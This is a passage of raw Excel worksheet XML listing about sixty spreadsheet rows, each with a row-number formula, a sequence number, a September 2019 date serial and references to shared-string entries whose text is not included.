      <c r="C10008" t="s">
        <v>19637</v>
      </c>
      <c r="D10008" s="1">
        <v>43715</v>
      </c>
      <c r="E10008" t="s">
        <v>19648</v>
      </c>
      <c r="F10008" t="s">
        <v>10021</v>
      </c>
      <c r="G10008" t="s">
        <v>19649</v>
      </c>
    </row>
    <row r="10009" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10009">
        <f t="shared" si="156"/>
        <v>10008</v>
      </c>
      <c r="B10009">
        <v>8</v>
      </c>
      <c r="C10009" t="s">
        <v>19637</v>
      </c>
      <c r="D10009" s="1">
        <v>43724</v>
      </c>
      <c r="E10009" t="s">
        <v>19650</v>
      </c>
      <c r="F10009" t="s">
        <v>10021</v>
      </c>
      <c r="G10009" t="s">
        <v>19651</v>
      </c>
    </row>
    <row r="10010" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10010">
        <f t="shared" si="156"/>
        <v>10009</v>
      </c>
      <c r="B10010">
        <v>9</v>
      </c>
      <c r="C10010" t="s">
        <v>19637</v>
      </c>
      <c r="D10010" s="1">
        <v>43723</v>
      </c>
      <c r="E10010" t="s">
        <v>19640</v>
      </c>
      <c r="F10010" t="s">
        <v>10021</v>
      </c>
      <c r="G10010" t="s">
        <v>19652</v>
      </c>
    </row>
    <row r="10011" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10011">
        <f t="shared" si="156"/>
        <v>10010</v>
      </c>
      <c r="B10011">
        <v>10</v>
      </c>
      <c r="C10011" t="s">
        <v>19637</v>
      </c>
      <c r="D10011" s="1">
        <v>43736</v>
      </c>
      <c r="E10011" t="s">
        <v>19653</v>
      </c>
      <c r="F10011" t="s">
        <v>9975</v>
      </c>
      <c r="G10011" t="s">
        <v>19654</v>
      </c>
    </row>
    <row r="10012" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10012">
        <f t="shared" si="156"/>
        <v>10011</v>
      </c>
      <c r="B10012">
        <v>11</v>
      </c>
      <c r="C10012" t="s">
        <v>19637</v>
      </c>
      <c r="D10012" s="1">
        <v>43724</v>
      </c>
      <c r="E10012" t="s">
        <v>19655</v>
      </c>
      <c r="F10012" t="s">
        <v>9975</v>
      </c>
    </row>
    <row r="10013" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10013">
        <f t="shared" si="156"/>
        <v>10012</v>
      </c>
      <c r="B10013">
        <v>12</v>
      </c>
      <c r="C10013" t="s">
        <v>19637</v>
      </c>
      <c r="D10013" s="1">
        <v>43714</v>
      </c>
      <c r="E10013" t="s">
        <v>12781</v>
      </c>
      <c r="F10013" t="s">
        <v>9975</v>
      </c>
      <c r="G10013" t="s">
        <v>19656</v>
      </c>
    </row>
    <row r="10014" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10014">
        <f t="shared" si="156"/>
        <v>10013</v>
      </c>
      <c r="B10014">
        <v>13</v>
      </c>
      <c r="C10014" t="s">
        <v>19637</v>
      </c>
      <c r="D10014" s="1">
        <v>43728</v>
      </c>
      <c r="E10014" t="s">
        <v>19657</v>
      </c>
      <c r="F10014" t="s">
        <v>10526</v>
      </c>
      <c r="G10014" t="s">
        <v>19658</v>
      </c>
    </row>
    <row r="10015" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10015">
        <f t="shared" si="156"/>
        <v>10014</v>
      </c>
      <c r="B10015">
        <v>14</v>
      </c>
      <c r="C10015" t="s">
        <v>19637</v>
      </c>
      <c r="D10015" s="1">
        <v>43709</v>
      </c>
      <c r="F10015" t="s">
        <v>9975</v>
      </c>
      <c r="G10015" t="s">
        <v>19659</v>
      </c>
    </row>
    <row r="10016" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10016">
        <f t="shared" si="156"/>
        <v>10015</v>
      </c>
      <c r="B10016">
        <v>15</v>
      </c>
      <c r="C10016" t="s">
        <v>19637</v>
      </c>
      <c r="D10016" s="1">
        <v>43719</v>
      </c>
      <c r="F10016" t="s">
        <v>10526</v>
      </c>
      <c r="G10016" t="s">
        <v>19660</v>
      </c>
    </row>
    <row r="10017" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10017">
        <f t="shared" si="156"/>
        <v>10016</v>
      </c>
      <c r="B10017">
        <v>16</v>
      </c>
      <c r="C10017" t="s">
        <v>19637</v>
      </c>
      <c r="D10017" s="1">
        <v>43717</v>
      </c>
      <c r="F10017" t="s">
        <v>10526</v>
      </c>
      <c r="G10017" t="s">
        <v>19661</v>
      </c>
    </row>
    <row r="10018" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10018">
        <f t="shared" si="156"/>
        <v>10017</v>
      </c>
      <c r="B10018">
        <v>17</v>
      </c>
      <c r="C10018" t="s">
        <v>19637</v>
      </c>
      <c r="D10018" s="1">
        <v>43733</v>
      </c>
      <c r="F10018" t="s">
        <v>10526</v>
      </c>
      <c r="G10018" t="s">
        <v>19662</v>
      </c>
    </row>
    <row r="10019" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10019">
        <f t="shared" si="156"/>
        <v>10018</v>
      </c>
      <c r="B10019">
        <v>18</v>
      </c>
      <c r="C10019" t="s">
        <v>19637</v>
      </c>
      <c r="D10019" s="1">
        <v>43713</v>
      </c>
      <c r="E10019" t="s">
        <v>19663</v>
      </c>
      <c r="F10019" t="s">
        <v>9975</v>
      </c>
      <c r="G10019" t="s">
        <v>19664</v>
      </c>
    </row>
    <row r="10020" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10020">
        <f t="shared" si="156"/>
        <v>10019</v>
      </c>
      <c r="B10020">
        <v>19</v>
      </c>
      <c r="C10020" t="s">
        <v>19637</v>
      </c>
      <c r="D10020" s="1">
        <v>43738</v>
      </c>
      <c r="F10020" t="s">
        <v>9975</v>
      </c>
      <c r="G10020" t="s">
        <v>19665</v>
      </c>
    </row>
    <row r="10021" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10021">
        <f t="shared" si="156"/>
        <v>10020</v>
      </c>
      <c r="B10021">
        <v>20</v>
      </c>
      <c r="C10021" t="s">
        <v>19637</v>
      </c>
      <c r="D10021" s="1">
        <v>43736</v>
      </c>
      <c r="E10021" t="s">
        <v>19640</v>
      </c>
      <c r="F10021" t="s">
        <v>9975</v>
      </c>
      <c r="G10021" t="s">
        <v>19666</v>
      </c>
    </row>
    <row r="10022" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10022">
        <f t="shared" si="156"/>
        <v>10021</v>
      </c>
      <c r="B10022">
        <v>21</v>
      </c>
      <c r="C10022" t="s">
        <v>19637</v>
      </c>
      <c r="D10022" s="1">
        <v>43710</v>
      </c>
      <c r="E10022" t="s">
        <v>19650</v>
      </c>
      <c r="F10022" t="s">
        <v>10021</v>
      </c>
      <c r="G10022" t="s">
        <v>19667</v>
      </c>
    </row>
    <row r="10023" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10023">
        <f t="shared" si="156"/>
        <v>10022</v>
      </c>
      <c r="B10023">
        <v>22</v>
      </c>
      <c r="C10023" t="s">
        <v>19637</v>
      </c>
      <c r="D10023" s="1">
        <v>43719</v>
      </c>
      <c r="E10023" t="s">
        <v>19668</v>
      </c>
      <c r="F10023" t="s">
        <v>9978</v>
      </c>
      <c r="G10023" t="s">
        <v>19669</v>
      </c>
    </row>
    <row r="10024" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10024">
        <f t="shared" si="156"/>
        <v>10023</v>
      </c>
      <c r="B10024">
        <v>23</v>
      </c>
      <c r="C10024" t="s">
        <v>19637</v>
      </c>
      <c r="D10024" s="1">
        <v>43736</v>
      </c>
      <c r="E10024" t="s">
        <v>19640</v>
      </c>
      <c r="F10024" t="s">
        <v>10021</v>
      </c>
      <c r="G10024" t="s">
        <v>19670</v>
      </c>
    </row>
    <row r="10025" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10025">
        <f t="shared" si="156"/>
        <v>10024</v>
      </c>
      <c r="B10025">
        <v>24</v>
      </c>
      <c r="C10025" t="s">
        <v>19637</v>
      </c>
      <c r="D10025" s="1">
        <v>43716</v>
      </c>
      <c r="E10025" t="s">
        <v>19640</v>
      </c>
      <c r="F10025" t="s">
        <v>9975</v>
      </c>
      <c r="G10025" t="s">
        <v>19671</v>
      </c>
    </row>
    <row r="10026" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10026">
        <f t="shared" si="156"/>
        <v>10025</v>
      </c>
      <c r="B10026">
        <v>25</v>
      </c>
      <c r="C10026" t="s">
        <v>19637</v>
      </c>
      <c r="D10026" s="1">
        <v>43731</v>
      </c>
      <c r="E10026" t="s">
        <v>19672</v>
      </c>
      <c r="F10026" t="s">
        <v>10021</v>
      </c>
      <c r="G10026" t="s">
        <v>19673</v>
      </c>
    </row>
    <row r="10027" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10027">
        <f t="shared" si="156"/>
        <v>10026</v>
      </c>
      <c r="B10027">
        <v>26</v>
      </c>
      <c r="C10027" t="s">
        <v>19637</v>
      </c>
      <c r="D10027" s="1">
        <v>43731</v>
      </c>
      <c r="E10027" t="s">
        <v>19674</v>
      </c>
      <c r="F10027" t="s">
        <v>10021</v>
      </c>
      <c r="G10027" t="s">
        <v>19675</v>
      </c>
    </row>
    <row r="10028" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10028">
        <f t="shared" si="156"/>
        <v>10027</v>
      </c>
      <c r="B10028">
        <v>27</v>
      </c>
      <c r="C10028" t="s">
        <v>19637</v>
      </c>
      <c r="D10028" s="1">
        <v>43718</v>
      </c>
      <c r="E10028" t="s">
        <v>19676</v>
      </c>
      <c r="F10028" t="s">
        <v>10021</v>
      </c>
      <c r="G10028" t="s">
        <v>19677</v>
      </c>
    </row>
    <row r="10029" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10029">
        <f t="shared" si="156"/>
        <v>10028</v>
      </c>
      <c r="B10029">
        <v>28</v>
      </c>
      <c r="C10029" t="s">
        <v>19637</v>
      </c>
      <c r="D10029" s="1">
        <v>43718</v>
      </c>
      <c r="E10029" t="s">
        <v>19640</v>
      </c>
      <c r="F10029" t="s">
        <v>9975</v>
      </c>
      <c r="G10029" t="s">
        <v>19678</v>
      </c>
    </row>
    <row r="10030" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10030">
        <f t="shared" si="156"/>
        <v>10029</v>
      </c>
      <c r="B10030">
        <v>29</v>
      </c>
      <c r="C10030" t="s">
        <v>19637</v>
      </c>
      <c r="D10030" s="1">
        <v>43738</v>
      </c>
      <c r="F10030" t="s">
        <v>10526</v>
      </c>
      <c r="G10030" t="s">
        <v>19679</v>
      </c>
    </row>
    <row r="10031" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10031">
        <f t="shared" si="156"/>
        <v>10030</v>
      </c>
      <c r="B10031">
        <v>30</v>
      </c>
      <c r="C10031" t="s">
        <v>19637</v>
      </c>
      <c r="D10031" s="1">
        <v>43737</v>
      </c>
      <c r="E10031" t="s">
        <v>19680</v>
      </c>
      <c r="F10031" t="s">
        <v>10021</v>
      </c>
      <c r="G10031" t="s">
        <v>19681</v>
      </c>
    </row>
    <row r="10032" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10032">
        <f t="shared" si="156"/>
        <v>10031</v>
      </c>
      <c r="B10032">
        <v>31</v>
      </c>
      <c r="C10032" t="s">
        <v>19637</v>
      </c>
      <c r="D10032" s="1">
        <v>43718</v>
      </c>
      <c r="E10032" t="s">
        <v>19640</v>
      </c>
      <c r="F10032" t="s">
        <v>10021</v>
      </c>
      <c r="G10032" t="s">
        <v>19682</v>
      </c>
    </row>
    <row r="10033" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10033">
        <f t="shared" si="156"/>
        <v>10032</v>
      </c>
      <c r="B10033">
        <v>32</v>
      </c>
      <c r="C10033" t="s">
        <v>19637</v>
      </c>
      <c r="D10033" s="1">
        <v>43727</v>
      </c>
      <c r="E10033" t="s">
        <v>19683</v>
      </c>
      <c r="F10033" t="s">
        <v>10526</v>
      </c>
      <c r="G10033" t="s">
        <v>19684</v>
      </c>
    </row>
    <row r="10034" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10034">
        <f t="shared" si="156"/>
        <v>10033</v>
      </c>
      <c r="B10034">
        <v>33</v>
      </c>
      <c r="C10034" t="s">
        <v>19637</v>
      </c>
      <c r="D10034" s="1">
        <v>43716</v>
      </c>
      <c r="E10034" t="s">
        <v>19685</v>
      </c>
      <c r="F10034" t="s">
        <v>9978</v>
      </c>
      <c r="G10034" t="s">
        <v>19686</v>
      </c>
    </row>
    <row r="10035" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10035">
        <f t="shared" si="156"/>
        <v>10034</v>
      </c>
      <c r="B10035">
        <v>34</v>
      </c>
      <c r="C10035" t="s">
        <v>19637</v>
      </c>
      <c r="D10035" s="1">
        <v>43720</v>
      </c>
      <c r="E10035" t="s">
        <v>19687</v>
      </c>
      <c r="F10035" t="s">
        <v>10021</v>
      </c>
      <c r="G10035" t="s">
        <v>19688</v>
      </c>
    </row>
    <row r="10036" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10036">
        <f t="shared" si="156"/>
        <v>10035</v>
      </c>
      <c r="B10036">
        <v>35</v>
      </c>
      <c r="C10036" t="s">
        <v>19637</v>
      </c>
      <c r="D10036" s="1">
        <v>43723</v>
      </c>
      <c r="E10036" t="s">
        <v>19640</v>
      </c>
      <c r="F10036" t="s">
        <v>9975</v>
      </c>
      <c r="G10036" t="s">
        <v>19689</v>
      </c>
    </row>
    <row r="10037" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10037">
        <f t="shared" si="156"/>
        <v>10036</v>
      </c>
      <c r="B10037">
        <v>36</v>
      </c>
      <c r="C10037" t="s">
        <v>19637</v>
      </c>
      <c r="D10037" s="1">
        <v>43715</v>
      </c>
      <c r="E10037" t="s">
        <v>19690</v>
      </c>
      <c r="F10037" t="s">
        <v>9978</v>
      </c>
      <c r="G10037" t="s">
        <v>19691</v>
      </c>
    </row>
    <row r="10038" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10038">
        <f t="shared" si="156"/>
        <v>10037</v>
      </c>
      <c r="B10038">
        <v>37</v>
      </c>
      <c r="C10038" t="s">
        <v>19637</v>
      </c>
      <c r="D10038" s="1">
        <v>43731</v>
      </c>
      <c r="E10038" t="s">
        <v>19645</v>
      </c>
      <c r="F10038" t="s">
        <v>9975</v>
      </c>
      <c r="G10038" t="s">
        <v>19692</v>
      </c>
    </row>
    <row r="10039" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10039">
        <f t="shared" si="156"/>
        <v>10038</v>
      </c>
      <c r="B10039">
        <v>38</v>
      </c>
      <c r="C10039" t="s">
        <v>19637</v>
      </c>
      <c r="D10039" s="1">
        <v>43723</v>
      </c>
      <c r="E10039" t="s">
        <v>19693</v>
      </c>
      <c r="F10039" t="s">
        <v>10526</v>
      </c>
      <c r="G10039" t="s">
        <v>19694</v>
      </c>
    </row>
    <row r="10040" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10040">
        <f t="shared" si="156"/>
        <v>10039</v>
      </c>
      <c r="B10040">
        <v>39</v>
      </c>
      <c r="C10040" t="s">
        <v>19637</v>
      </c>
      <c r="D10040" s="1">
        <v>43710</v>
      </c>
      <c r="E10040" t="s">
        <v>19695</v>
      </c>
      <c r="F10040" t="s">
        <v>9975</v>
      </c>
      <c r="G10040" t="s">
        <v>19696</v>
      </c>
    </row>
    <row r="10041" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10041">
        <f t="shared" si="156"/>
        <v>10040</v>
      </c>
      <c r="B10041">
        <v>40</v>
      </c>
      <c r="C10041" t="s">
        <v>19637</v>
      </c>
      <c r="D10041" s="1">
        <v>43731</v>
      </c>
      <c r="E10041" t="s">
        <v>19663</v>
      </c>
      <c r="F10041" t="s">
        <v>9975</v>
      </c>
      <c r="G10041" t="s">
        <v>19697</v>
      </c>
    </row>
    <row r="10042" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10042">
        <f t="shared" si="156"/>
        <v>10041</v>
      </c>
      <c r="B10042">
        <v>41</v>
      </c>
      <c r="C10042" t="s">
        <v>19637</v>
      </c>
      <c r="D10042" s="1">
        <v>43719</v>
      </c>
      <c r="F10042" t="s">
        <v>10526</v>
      </c>
      <c r="G10042" t="s">
        <v>19698</v>
      </c>
    </row>
    <row r="10043" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10043">
        <f t="shared" si="156"/>
        <v>10042</v>
      </c>
      <c r="B10043">
        <v>42</v>
      </c>
      <c r="C10043" t="s">
        <v>19637</v>
      </c>
      <c r="D10043" s="1">
        <v>43728</v>
      </c>
      <c r="E10043" t="s">
        <v>19655</v>
      </c>
      <c r="F10043" t="s">
        <v>9975</v>
      </c>
      <c r="G10043" t="s">
        <v>19699</v>
      </c>
    </row>
    <row r="10044" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10044">
        <f t="shared" si="156"/>
        <v>10043</v>
      </c>
      <c r="B10044">
        <v>43</v>
      </c>
      <c r="C10044" t="s">
        <v>19637</v>
      </c>
      <c r="D10044" s="1">
        <v>43725</v>
      </c>
      <c r="E10044" t="s">
        <v>19653</v>
      </c>
      <c r="F10044" t="s">
        <v>9975</v>
      </c>
      <c r="G10044" t="s">
        <v>19700</v>
      </c>
    </row>
    <row r="10045" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10045">
        <f t="shared" si="156"/>
        <v>10044</v>
      </c>
      <c r="B10045">
        <v>44</v>
      </c>
      <c r="C10045" t="s">
        <v>19637</v>
      </c>
      <c r="D10045" s="1">
        <v>43726</v>
      </c>
      <c r="E10045" t="s">
        <v>19701</v>
      </c>
      <c r="F10045" t="s">
        <v>10021</v>
      </c>
      <c r="G10045" t="s">
        <v>19702</v>
      </c>
    </row>
    <row r="10046" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10046">
        <f t="shared" si="156"/>
        <v>10045</v>
      </c>
      <c r="B10046">
        <v>45</v>
      </c>
      <c r="C10046" t="s">
        <v>19637</v>
      </c>
      <c r="D10046" s="1">
        <v>43719</v>
      </c>
      <c r="E10046" t="s">
        <v>19640</v>
      </c>
      <c r="F10046" t="s">
        <v>9975</v>
      </c>
      <c r="G10046" t="s">
        <v>19703</v>
      </c>
    </row>
    <row r="10047" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10047">
        <f t="shared" si="156"/>
        <v>10046</v>
      </c>
      <c r="B10047">
        <v>46</v>
      </c>
      <c r="C10047" t="s">
        <v>19637</v>
      </c>
      <c r="D10047" s="1">
        <v>43738</v>
      </c>
      <c r="F10047" t="s">
        <v>10526</v>
      </c>
      <c r="G10047" t="s">
        <v>19704</v>
      </c>
    </row>
    <row r="10048" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10048">
        <f t="shared" si="156"/>
        <v>10047</v>
      </c>
      <c r="B10048">
        <v>47</v>
      </c>
      <c r="C10048" t="s">
        <v>19637</v>
      </c>
      <c r="D10048" s="1">
        <v>43725</v>
      </c>
      <c r="E10048" t="s">
        <v>19705</v>
      </c>
      <c r="F10048" t="s">
        <v>10021</v>
      </c>
      <c r="G10048" t="s">
        <v>19706</v>
      </c>
    </row>
    <row r="10049" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10049">
        <f t="shared" si="156"/>
        <v>10048</v>
      </c>
      <c r="B10049">
        <v>48</v>
      </c>
      <c r="C10049" t="s">
        <v>19637</v>
      </c>
      <c r="D10049" s="1">
        <v>43728</v>
      </c>
      <c r="F10049" t="s">
        <v>10526</v>
      </c>
      <c r="G10049" t="s">
        <v>19707</v>
      </c>
    </row>
    <row r="10050" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10050">
        <f t="shared" si="156"/>
        <v>10049</v>
      </c>
      <c r="B10050">
        <v>49</v>
      </c>
      <c r="C10050" t="s">
        <v>19637</v>
      </c>
      <c r="D10050" s="1">
        <v>43737</v>
      </c>
      <c r="F10050" t="s">
        <v>10021</v>
      </c>
      <c r="G10050" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="10051" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10051">
        <f t="shared" ref="A10051:A10114" si="157">+ROW(A10050)</f>
        <v>10050</v>
      </c>
      <c r="B10051">
        <v>50</v>
      </c>
      <c r="C10051" t="s">
        <v>19637</v>
      </c>
      <c r="D10051" s="1">
        <v>43722</v>
      </c>
      <c r="E10051" t="s">
        <v>19709</v>
      </c>
      <c r="F10051" t="s">
        <v>10526</v>
      </c>
      <c r="G10051" t="s">
        <v>19710</v>
      </c>
    </row>
    <row r="10052" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10052">
        <f t="shared" si="157"/>
        <v>10051</v>
      </c>
      <c r="B10052">
        <v>51</v>
      </c>
      <c r="C10052" t="s">
        <v>19637</v>
      </c>
      <c r="D10052" s="1">
        <v>43722</v>
      </c>
      <c r="E10052" t="s">
        <v>19711</v>
      </c>
      <c r="F10052" t="s">
        <v>10526</v>
      </c>
      <c r="G10052" t="s">
        <v>19712</v>
      </c>
    </row>
    <row r="10053" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10053">
        <f t="shared" si="157"/>
        <v>10052</v>
      </c>
      <c r="B10053">
        <v>52</v>
      </c>
      <c r="C10053" t="s">
        <v>19637</v>
      </c>
      <c r="D10053" s="1">
        <v>43727</v>
      </c>
      <c r="E10053" t="s">
        <v>19713</v>
      </c>
      <c r="F10053" t="s">
        <v>9978</v>
      </c>
      <c r="G10053" t="s">
        <v>19714</v>
      </c>
    </row>
    <row r="10054" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10054">
        <f t="shared" si="157"/>
        <v>10053</v>
      </c>
      <c r="B10054">
        <v>53</v>
      </c>
      <c r="C10054" t="s">
        <v>19637</v>
      </c>
      <c r="D10054" s="1">
        <v>43734</v>
      </c>
      <c r="E10054" t="s">
        <v>19715</v>
      </c>
      <c r="F10054" t="s">
        <v>10021</v>
      </c>
      <c r="G10054" t="s">
        <v>19716</v>
      </c>
    </row>
    <row r="10055" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10055">
        <f t="shared" si="157"/>
        <v>10054</v>
      </c>
      <c r="B10055">
        <v>54</v>
      </c>
      <c r="C10055" t="s">
        <v>19637</v>
      </c>
      <c r="D10055" s="1">
        <v>43731</v>
      </c>
      <c r="E10055" t="s">
        <v>19717</v>
      </c>
      <c r="F10055" t="s">
        <v>10526</v>
      </c>
      <c r="G10055" t="s">
        <v>19718</v>
      </c>
    </row>
    <row r="10056" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10056">
        <f t="shared" si="157"/>
        <v>10055</v>
      </c>
      <c r="B10056">
        <v>55</v>
      </c>
      <c r="C10056" t="s">
        <v>19637</v>
      </c>
      <c r="D10056" s="1">
        <v>43719</v>
      </c>
      <c r="E10056" t="s">
        <v>19719</v>
      </c>
      <c r="F10056" t="s">
        <v>10526</v>
      </c>
      <c r="G10056" t="s">
        <v>19720</v>
      </c>
    </row>
    <row r="10057" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10057">
        <f t="shared" si="157"/>
        <v>10056</v>
      </c>
      <c r="B10057">
        <v>56</v>
      </c>
      <c r="C10057" t="s">
        <v>19637</v>
      </c>
      <c r="D10057" s="1">
        <v>43717</v>
      </c>
      <c r="F10057" t="s">
        <v>10526</v>
      </c>
      <c r="G10057" t="s">
        <v>19721</v>
      </c>
    </row>
    <row r="10058" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10058">
        <f t="shared" si="157"/>
        <v>10057</v>
      </c>
      <c r="B10058">
        <v>57</v>
      </c>
      <c r="C10058" t="s">
        <v>19637</v>
      </c>
      <c r="D10058" s="1">
        <v>43730</v>
      </c>
      <c r="E10058" t="s">
        <v>19705</v>
      </c>
      <c r="F10058" t="s">
        <v>10021</v>
      </c>
      <c r="G10058" t="s">
        <v>19722</v>
      </c>
    </row>
    <row r="10059" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10059">
        <f t="shared" si="157"/>
        <v>10058</v>
      </c>
      <c r="B10059">
        <v>58</v>
      </c>
      <c r="C10059" t="s">
        <v>19637</v>
      </c>
      <c r="D10059" s="1">
        <v>43714</v>
      </c>
      <c r="E10059" t="s">
        <v>19640</v>
      </c>
      <c r="F10059" t="s">
        <v>10021</v>
      </c>
      <c r="G10059" t="s">
        <v>19723</v>
      </c>
    </row>
    <row r="10060" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10060">
        <f t="shared" si="157"/>
        <v>10059</v>
      </c>
      <c r="B10060">
        <v>59</v>
      </c>
      <c r="C10060" t="s">
        <v>19637</v>
      </c>
      <c r="D10060" s="1">
        <v>43734</v>
      </c>
      <c r="F10060" t="s">
        <v>10526</v>
      </c>
      <c r="G10060" t="s">
        <v>19724</v>
      </c>
    </row>
    <row r="10061" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10061">
        <f t="shared" si="157"/>
        <v>10060</v>
      </c>
      <c r="B10061">
        <v>60</v>
      </c>
      <c r="C10061" t="s">
        <v>19637</v>
      </c>
      <c r="D10061" s="1">
        <v>43734</v>
      </c>
      <c r="E10061" t="s">
        <v>19725</v>
      </c>
      <c r="F10061" t="s">
        <v>9978</v>
      </c>
      <c r="G10061" t="s">
        <v>19726</v>
      </c>
    </row>
    <row r="10062" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10062">
        <f t="shared" si="157"/>
        <v>10061</v>
      </c>
      <c r="B10062">
        <v>61</v>
      </c>
      <c r="C10062" t="s">
        <v>19637</v>
      </c>
      <c r="D10062" s="1">
        <v>43722</v>
      </c>
      <c r="E10062" t="s">
        <v>19727</v>
      </c>
      <c r="F10062" t="s">
        <v>9975</v>
      </c>
      <c r="G10062" t="s">
        <v>19728</v>
      </c>
    </row>
    <row r="10063" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10063">
        <f t="shared" si="157"/>
        <v>10062</v>
      </c>
      <c r="B10063">
        <v>62</v>
      </c>
      <c r="C10063" t="s">
        <v>19637</v>
      </c>
      <c r="D10063" s="1">
        <v>43715</v>
      </c>
      <c r="F10063" t="s">
        <v>10526</v>
      </c>
      <c r="G10063" t="s">
        <v>19729</v>
      </c>
    </row>
    <row r="10064" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10064">
        <f t="shared" si="157"/>
        <v>10063</v>
      </c>
      <c r="B10064">
        <v>63</v>
      </c>
      <c r="C10064" t="s">
        <v>19637</v>
      </c>
      <c r="D10064" s="1">
        <v>43732</v>
      </c>
      <c r="E10064" t="s">
        <v>19730</v>
      </c>
      <c r="F10064" t="s">
        <v>9978</v>
      </c>
      <c r="G10064" t="s">
        <v>19731</v>
      </c>
    </row>
    <row r="10065" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10065">
        <f t="shared" si="157"/>
        <v>10064</v>
      </c>
      <c r="B10065">
        <v>64</v>
      </c>
      <c r="C10065" t="s">
        <v>19637</v>
      </c>
      <c r="D10065" s="1">
        <v>43731</v>
      </c>
      <c r="E10065" t="s">
        <v>19643</v>
      </c>
      <c r="F10065" t="s">
        <v>10021</v>
      </c>
      <c r="G10065" t="s">
        <v>19732</v>
      </c>
    </row>
    <row r="10066" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10066">
        <f t="shared" si="157"/>
        <v>10065</v>
      </c>
      <c r="B10066">
        <v>65</v>
      </c>
      <c r="C10066" t="s">
        <v>19637</v>
      </c>
      <c r="D10066" s="1">
        <v>43718</v>
      </c>
      <c r="E10066" t="s">
        <v>19733</v>
      </c>
      <c r="F10066" t="s">
        <v>10021</v>
      </c>
      <c r="G10066" t="s">
        <v>19734</v>
      </c>
    </row>
    <row r="10067" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10067">
        <f t="shared" si="157"/>
        <v>10066</v>
      </c>
      <c r="B10067">
        <v>66</v>
      </c>
      <c r="C10067" t="s">
        <v>19637</v>
      </c>
      <c r="D10067" s="1">
        <v>43738</v>
      </c>
      <c r="F10067" t="s">
        <v>10526</v>
      </c>
      <c r="G10067" t="s">
        <v>19735</v>
      </c>
    </row>
    <row r="10068" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10068">
        <f t="shared" si="157"/>
        <v>10067</v>
      </c>
      <c r="B10068">
        <v>67</v>
      </c>
      <c r="C10068" t="s">
        <v>19637</v>
      </c>
      <c r="D10068" s="1">
        <v>43713</v>
      </c>
      <c r="E10068" t="s">
        <v>19736</v>
      </c>
      <c r="F10068" t="s">
        <v>10526</v>
      </c>
      <c r="G10068" t="s">
        <v>19737</v>
      </c>
    </row>
    <row r="10069" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10069">
        <f t="shared" si="157"/>
        <v>10068</v>
      </c>
      <c r="B10069">
        <v>68</v>
      </c>
      <c r="C10069" t="s">
        <v>19637</v>
      </c>
      <c r="D10069" s="1">
        <v>43736</v>
      </c>
      <c r="E10069" t="s">
        <v>19648</v>
      </c>
      <c r="F10069" t="s">
        <v>10021</v>
      </c>
      <c r="G10069" t="s">
        <v>19738</v>
      </c>
    </row>
    <row r="10070" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10070">
        <f t="shared" si="157"/>
        <v>10069</v>
      </c>
      <c r="B10070">
        <v>69</v>
      </c>
      <c r="C10070" t="s">
        <v>19637</v>
      </c>
      <c r="D10070" s="1">
        <v>43725</v>
      </c>
      <c r="E10070" t="s">
        <v>19672</v>
      </c>
      <c r="F10070" t="s">
        <v>10021</v>
      </c>
      <c r="G10070" t="s">
        <v>19739</v>
      </c>
    </row>
    <row r="10071" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10071">
        <f t="shared" si="157"/>
        <v>10070</v>
      </c>
